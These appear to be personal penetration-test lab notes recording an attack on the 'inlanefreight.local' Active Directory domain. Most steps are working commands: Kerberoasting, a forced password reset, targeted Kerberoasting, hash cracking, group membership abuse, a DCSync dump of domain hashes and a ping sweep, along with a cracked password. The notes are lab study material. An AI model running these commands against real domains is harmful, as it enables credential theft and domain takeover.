# Nmap scans - light > DC? ![[images/Pasted image 20260701202818.png]] - create `ports.txt` ![[images/Pasted image 20260701202924.png]] - detailed ![[images/Pasted image 20260701203212.png]] # AS-REProasting Check - nothing ```bash nxc ldap 172.16.8.3 -u hporter -p password -d inlanefreight.local --asreproast asrep.out ``` ![[images/Pasted image 20260702201901.png]] # ADCS Check - nothing ```bash nxc ldap 172.16.8.3 -u hporter -p password -d inlanefreight.local -M adcs ``` ![[images/Pasted image 20260702201618.png]] # Kerberoasting Check - errors with `nxc` but some hashes with `GetUserSPNs.py` ```bash GetUserSPNs.py inlanefreight.local/hporter -dc-ip 172.16.8.3 -request -outputfile kerb.out ``` ![[images/Pasted image 20260702202539.png]] - are these even in scope? we haven't seen some of these machines ![[images/Pasted image 20260702202615.png]] - double check the subnet ![[images/Pasted image 20260702202630.png]] # Port 445 (SMB) ## enum as `hporter` - shares ![[images/Pasted image 20260702154812.png]] - `smbclient` ![[images/Pasted image 20260702155232.png]] - all dirs are empty > come back when we have more creds - `smbmap` ![[images/Pasted image 20260702155406.png]] - grab `adum.vbs` > potential creds ![[images/Pasted image 20260702160029.png]] - users > there's a lot! - rid-brute > also a lot! # Bloodhound - run an ingestor ```bash /opt/rusthound-ce -ns 172.16.8.3 -d inlanefreight.local -u hporter -p password -c All -z sudo bloodhound-python -u 'hporter' -p password -d inlanefreight.local -dc dc01.inlanefreight.local -ns 172.16.8.3 -d inlanefreight.local -c all --zip ``` - `hporter` outbound object control ![[images/Pasted image 20260702203439.png]] - `ssmalls` membership ![[images/Pasted image 20260702203511.png]] - change password for `ssmalls` ```bash bloodyad --host 172.16.8.3 -d inlanefreight.local -u hporter -p $password set password ssmalls password123 ``` ![[images/Pasted image 20260702205631.png]] - maybe `ssmalls` has more access to `\Department Shares\IT` because he's in the `IT Admins` group? - confirmed ![[images/Pasted image 20260702205925.png]] - this script has creds for `backupadm` - confirm creds - confirmed smb access to DC01 and MS01 - no extra access to `Department Shares` on DC01 ![[images/Pasted image 20260702214935.png]] ```bash smbmap -H 172.16.8.3 -u backupadm -p password -r 'Department Shares' --depth 3 ``` - check winrm access - no access to DC01; access to MS01 --- # DC01 Privesc - `mssqladm` membership ![[images/Pasted image 20260703155747.png]] - `mssqladm` abilities ![[images/Pasted image 20260703155940.png]] - `server admins` can DCSYNC ![[images/Pasted image 20260703160009.png]] ## `ttimmons` targetedkerberoast - use `mssqladm` `genericwrite` ACE over `ttimmons` to do a `targetkerberoast.py` of `ttimmons` ```bash python3 targetedKerberoast.py -d inlanefreight.local -u mssqladm -p password --dc-ip 172.16.8.3 --request-user ttimmons | tee ttimmons.tgs.hash ``` ![[images/Pasted image 20260703194914.png]] - crack tgs for `ttimons` ```bash hashcat -m 13100 ttimmons.tgs.hash /opt/rockyou.txt ``` ![[images/Pasted image 20260703195347.png]] ## DCSync - use `ttimmons` `genericall` ACE over `server admins` group to add `ttimmons` to the group ```bash bloodyad -d inlanefreight.local -u ttimmons -p Repeat09 --host 172.16.8.3 add groupMember "Server Admins" ttimmons bloodyad -d inlanefreight.local -u ttimmons -p Repeat09 --host 172.16.8.3 get object "Server Admins" --attr member #confirm ``` ![[images/Pasted image 20260703195432.png]]![[images/Pasted image 20260703195441.png]] - use `ttimmons` membership in `Server Admins` to perform a DCSync attack ```bash secretsdump.py inlanefreight.local/[email protected] -outputfile inlanefreight.hashes -just-dc ``` ![[images/Pasted image 20260703200323.png]] ## Shell as `inlanefreight/administrator` - cascade home dir ![[images/Pasted image 20260703200510.png]] - networking - `ipconfig` shows that DC01 is dual homed ![[images/Pasted image 20260703202106.png]] - `arp -a` and `route print` ![[images/Pasted image 20260703202126.png]] - check for flags ```powershell Get-ChildItem -Path C:\ -Filter "flag.txt" -Recurse -ErrorAction SilentlyContinue ``` ![[images/Pasted image 20260703202529.png]] - run `ping` for loop against 172.16.9.0/24 - taking way too long; do this again once we have our double pivot established - try again > only one host this time ```powershell 1..254 | ForEach-Object { $ip = "172.16.9.$_"; if (Test-Connection -ComputerName $ip -Count 1 -Quiet) { Write-Output "$ip is UP" } } 1..100 | % {"172.16.9.$($_): $(Test-Connection -count 1 -comp 172.16.9.$($_) -quiet)"} ``` ![[images/Pasted image 20260703205711.png]] - cascade `\department shares` ![[images/Pasted image 20260703204810.png]] - `id_rsa` for harry, james, and ssmallsadm